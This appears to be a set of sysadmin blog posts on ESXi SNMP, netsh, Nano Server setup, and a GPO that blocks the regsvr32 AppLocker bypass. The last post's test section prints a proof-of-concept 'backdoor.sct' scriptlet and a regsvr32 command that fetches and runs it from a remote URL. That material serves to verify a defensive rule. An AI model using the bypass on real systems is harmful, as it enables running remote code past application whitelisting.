Monitor ESXi Free using SNMP

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

ESXi 4.1 and 5.0 Enable SNMP

SSH to host and edit the SNMP.XML file:

vi /etc/vmware/snmp.xml

Make the following changes:

<config>
<snmpSettings>
<enable>true</enable>
<communities>public</communities>
<targets>192.168.1.100@public</targets>
</snmpSettings>
</config>

Restart management agents with the following command:

/etc/init.d/hostd restart

On ESXi 5.1 and 5.5 enable SNMP

SSH to host and run the following command:

esxcli system snmp set --communities=public --enable=yes --targets=192.168.1.100/public

Test SNMP trap

vicfg-snmp --server <ESXiServerIP> --username root --password <Password> --test

Reviewing the SNMP configuration

When I look at my SNMP configuration using vCLI (once again, this is a read operation so I can use vCLI), I see the following.

vi-admin@vma:~> vicfg-snmp --server <ESXiServerIP> --username root --password <Password> -s

Current SNMP agent settings:
Enabled : 1
UDP port : 161

Communities :
public

Notification targets :
192.168.1.100@162/public

Options :
EnvEventSource=indications

Use netsh to set interface IP static or dhcp

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

Get Configuration Info

Using the command below, you can gather information on the adapter’s current configuration. Make note of the connection name since that is what is used to in the configuration command further down.

netsh interface ip show config
Figure 1 - Example of netsh interface ip show config

Figure 1 – Example of netsh interface ip show config

You can see the existing configuration with the following command.

netsh interface ip dump
2016-05-05_113938

Figure 2 – Example of netsh interface ip dump

Set Interface DHCP

To set interface address as DHCP, issue the following.  Change the items highlighted in Red to suite your environment.

Note:  Use the above command (netsh interface ip dump) to figure out which interface you need to use.  Default is “Local Area Connection” but many environments will differ.  Match the interface= portion and supply that in the Red sections below.  I’m leaving the default of “Local Area Connection” but you can see that my interface would be “Ethernet”.

2016-05-05_113938-2

Figure 3 – Determine the interface name to use when configuring the interface via netsh

netsh interface ip set address "Local Area Connection" dhcp

You also can set the DNS statically or via DHCP as well.

netsh interface ip set dns "Local Area Connection" 8.8.4.4

Set a secondary DNS server:

netsh interface ip set dns "Local Area Connection" 8.8.4.4 index=2

Set Interface Static

Set the interface with a static address. Change the items in Red to suite your environment.

netsh interface ip set address "Local Area Connection" static ipaddr subnetmask gateway metric

Set the DNS server statically.

netsh interface ip set dns "Local Area Connection" 8.8.4.4

Set a secondary DNS server:

netsh interface ip set dns "Local Area Connection" 8.8.4.4 index=2

Join Nano Server to a Domain

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

To join my Windows Server 2016 Nano server to my test domain I used the djoin.exe (Domain Join) command.

From a domain controller, or server already joined to my domain, I run the following command.  This will create a file called NANOSERVERTP5 at the location I run the command.

(Change items hilighted in Red)

djoin.exe /provision /domain TESTDOMAIN /machine NANOSERVERTP5 /reuse /savefile .NANOSERVERTP5

2016-04-28_010017

Copy the NANOSERVERTP5 file to C: on the Nano Server.  I temporarily enabled File and Sharing through the Firewall on the Nano Server in order to gain access to the Administrative share, so I could copy it to 192.168.100.50c$.

In order to enter into a remote Powershell session, I needed to make sure I had a trusted host entry for my Nano Server in Web Services Management (WS-Management, or WSMan).  I launched an administrative Powershell shell.  Also, make sure WinRM service is running on the machine you’ll be using (net start winrm).

(Change items hilighted in Red)

Set-Item WSMan:localhostClientTrustedHosts -Value 192.168.100.50 -Concatenate

Accept (Y) the WinRM security prompt.

Start a remote PowerShell session into the Nano Server.

Enter-PSSession -ComputerName 192.168.100.50 -Credential Administrator

Run djoin and specify the location that NANOSERVERTP5 file was copied to; in my case, C:NANOSERVERTP5.

djoin /requestodj /loadfile c:NANOSERVERTP5 /windowspath c:windows /localos

Create Nano Server Image

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

I was trying to build a Nano Server image (2016 Tech Preview 5) and kept getting the following error:

2016-04-28_120004

Turns out that is because the documentation is not updated and instead of -GuestDrivers it now uses:

  1. -Edition [ Standard | Datacenter]
  2. -DeploymentType [ Guest | Host ]

Running the following updated command works without issue building the image.

(Change items hilighted in Red)

New-NanoServerImage -MediaPath c:tp5iso -BasePath .Base -TargetPath .Nano1Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard

Add Packages

You can add packages to the image that is being built by specifying -Packages [PackageName].

To install IIS, for example:
(Change items hilighted in Red)

New-NanoServerImage -MediaPath c:tp5iso -BasePath .Base -TargetPath .Nano1Nano3.vhd -ComputerName Nano3 -DeploymentType Guest -Edition Standard -Packages Microsoft-NanoServer-IIS-Package

Here’s a listing of the Packages in the Server 2016 TP5 ISO as of this writing.

I used the following command within the Packages directory of the Nano distribution to generate this.

PS C:usersrkreiderdesktopnanobasePackages> gci . -filter *.cab | foreach-object { write-output $_.basename; dism /online /get-packageinfo /packagepath:$_ | select-string Description|Product Name|^Name :; }
  • Microsoft-NanoServer-BootFromWim-Package
    Description : Boot from WIM support
    Name : Boot from WIM support
    Product Name : Microsoft-NanoServer-BootFromWim-Feature-Package
  • Microsoft-NanoServer-Compute-Package
    Description : Hyper-V provides the services that you can use to create and manage virtual machines and their resources. Each virtual machine is a virtualized computer system that operates in an isolated execution environment. This allows you to run multiple operating systems simultaneously.
    Name : Hyper-V
    Product Name : Microsoft-NanoServer-Compute-Feature-Package
  • Microsoft-NanoServer-Containers-Package
    Description : Provides services and tools to create and manage Windows Server Containers and their resources.
    Name : Containers
    Product Name : Microsoft-NanoServer-Containers-Feature-Package
  • Microsoft-NanoServer-DCB-Package
    Description : Data Center Bridging (DCB) is a suite of IEEE standards that are used to enhance Ethernet local area networks by providing hardware-based bandwidth guarantees and transport reliability. Use DCB to help enforce bandwidth allocation on a Converged Network Adapter for offloaded storage traffic such as Internet Small Computer System Interface, RDMA over Converged Ethernet, and Fibre Channel over Ethernet.
    Name : Data Center Bridging
    Product Name : Microsoft-NanoServer-DCB-Feature-Package
  • Microsoft-NanoServer-Defender-Package
    Description : Windows Server Antimalware helps protect your machine from malware.
    Name : Windows Server Antimalware
    Product Name : Microsoft-NanoServer-Defender-Feature-Package
  • Microsoft-NanoServer-DNS-Package
    Description : Domain Name System (DNS) Server provides name resolution for TCP/IP networks. DNS Server is easier to manage when it is installed on the same server as Active Directory Domain Services. If you select the Active Directory
    Domain Services role, you can install and configure DNS Server and Active Directory Domain Services to work together.
    Name : DNS Server
    Product Name : Microsoft-NanoServer-DNS-Feature-Package
  • Microsoft-NanoServer-DSC-Package
    Description : Windows PowerShell Desired State Configuration is a configuration management platform that uses a declarative syntax to express and enact system configuration state.
    Name : Windows PowerShell Desired State Configuration
    Product Name : Microsoft-NanoServer-DSC-Feature-Package
  • Microsoft-NanoServer-FailoverCluster-Package
    Description : Failover Clustering allows multiple servers to work together to provide high availability of server roles. Failover Clustering is often used for File Services, virtual machines, database applications, and mail applications.
    Name : Failover Clustering Service
    Product Name : Microsoft-NanoServer-FailoverCluster-Feature-Package
  • Microsoft-NanoServer-Guest-Package
    Description : Hyper-V guest drivers for using Nano Server as a virtual machine
    Name : Hyper-V guest drivers
    Product Name : Microsoft-NanoServer-Guest-Feature-Package
  • Microsoft-NanoServer-Host-Package
    Description : Support for bare metal deployments
    Name : Bare metal deployment
    Product Name : Microsoft-NanoServer-Host-Feature-Package
  • Microsoft-NanoServer-IIS-Package
    Description : Web Server (IIS) provides a reliable, manageable, and scalable Web application infrastructure.
    Name : Web Server (IIS)
    Product Name : Microsoft-NanoServer-IIS-Feature-Package
  • Microsoft-NanoServer-NPDS-Package
    Description : Network Performance Diagnostics Service (NPDS)
    Name : Network Performance Diagnostics Service (NPDS)
    Product Name : Microsoft-NanoServer-NPDS-Feature-Package
  • Microsoft-NanoServer-OEM-Drivers-Package
    Description : Server Core drivers
    Name : Server Core drivers
    Product Name : Microsoft-NanoServer-OEM-Drivers-Feature-Package
  • Microsoft-NanoServer-SCVMM-Compute-Package
    Description : System Center Virtual Machine Manager Hyper-V agent
    Name : System Center Virtual Machine Manager Hyper-V agent
    Product Name : Microsoft-NanoServer-SCVMM-Compute-Feature-Package
  • Microsoft-NanoServer-SCVMM-Package
    Description : System Center Virtual Machine Manager agent
    Name : System Center Virtual Machine Manager agent
    Product Name : Microsoft-NanoServer-SCVMM-Feature-Package
  • Microsoft-NanoServer-SecureStartup-Package
    Description : Secure Startup support
    Name : Secure Startup support
    Product Name : Microsoft-NanoServer-SecureStartup-Feature-Package
  • Microsoft-NanoServer-ShieldedVM-Package
    Description : Host Guardian provides the features necessary on a Hyper-V server to provision Shielded Virtual Machines.
    Name : Shielded VM support
    Product Name : Microsoft-NanoServer-ShieldedVM-Feature-Package
  • Microsoft-NanoServer-Storage-Package
    Description : File Server role and other storage components
    Name : File Server role and other storage components
    Product Name : Microsoft-NanoServer-Storage-Feature-Package

GPO to block regsvr32 AppLocker Bypass Vulnerability

This content is 3 years old. Technology changes with time. Keep that in mind as you read this article.

A recently discovered method of bypassing AppLocker by using regsvr32.exe, poses a threat to users on Windows 7, 8/8.1, and 10 (Professional or Enterprise editions).  To work around this issue and prevent regsvr32 from accessing remote resources, you can block regsvr32.exe in the Windows Firewall.  Taking it a step further, I have added a new GPO to block this domain-wide within my company. Here are some of my notes.

Create a GPO and Edit

In Group Policy Management, I created a new GPO and named it Firewall:  Block regsvr32 then I edited it.

Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security

Add a rule to both Inbound Rules and Outbound Rules to block regsvr32.exe.

2016-04-27_111611

Create a new inbound rule to block regsvr32.exe

Inbound Rule Wizard

2016-04-27_111627

Choose Program as the type of rule to create and click Next >

2016-04-27_111642

Use C:windowssystem32regsvr32.exe as the path; you can either type it in or click Browse… to navigate to it and choose.

2016-04-27_111651

Choose Block as the action and click Next >

2016-04-27_111659

Apply it to all network locations.

2016-04-27_111717

Give the rule a name and possibly a description.

2016-04-27_111733

Rule to block is now listed in Inbound Rules

Outbound Rule Wizard

Repeat the steps from the Inbound Rule Wizard, but as a new Outbound Rules rule.

Link GPO

Now that the GPO is created, you can link the policy within your domain as usual.

Testing

To test that the rule is effective, run gpupdate /force on your system to force an immediate security group policy application.

I’ll leave the following backdoor.sct on my server if you want to test against it, but you can also save the following to a file and save it (doesn’t have to be extension .SCT, can be anything…).

backdoor.sct

<?XML version=1.0?>
<scriptlet>
<registration
 progid=Empire
 classid={F0001111-0000-0000-0000-0000FEEDACDC} >
 <!-- Proof Of Concept - Casey Smith @subTee -->
 <script language=JScript>
 <![CDATA[

 var r = new ActiveXObject(WScript.Shell).Run(cmd.exe);

 ]]>
</script>
</registration>
</scriptlet>

Command to run:

regsvr32 /s /n /u /i:https://techish.net/pub/backdoor.sct scrobj.dll

If a command window opens, the GPO created is not blocking it (for one reason or another; double-check your work).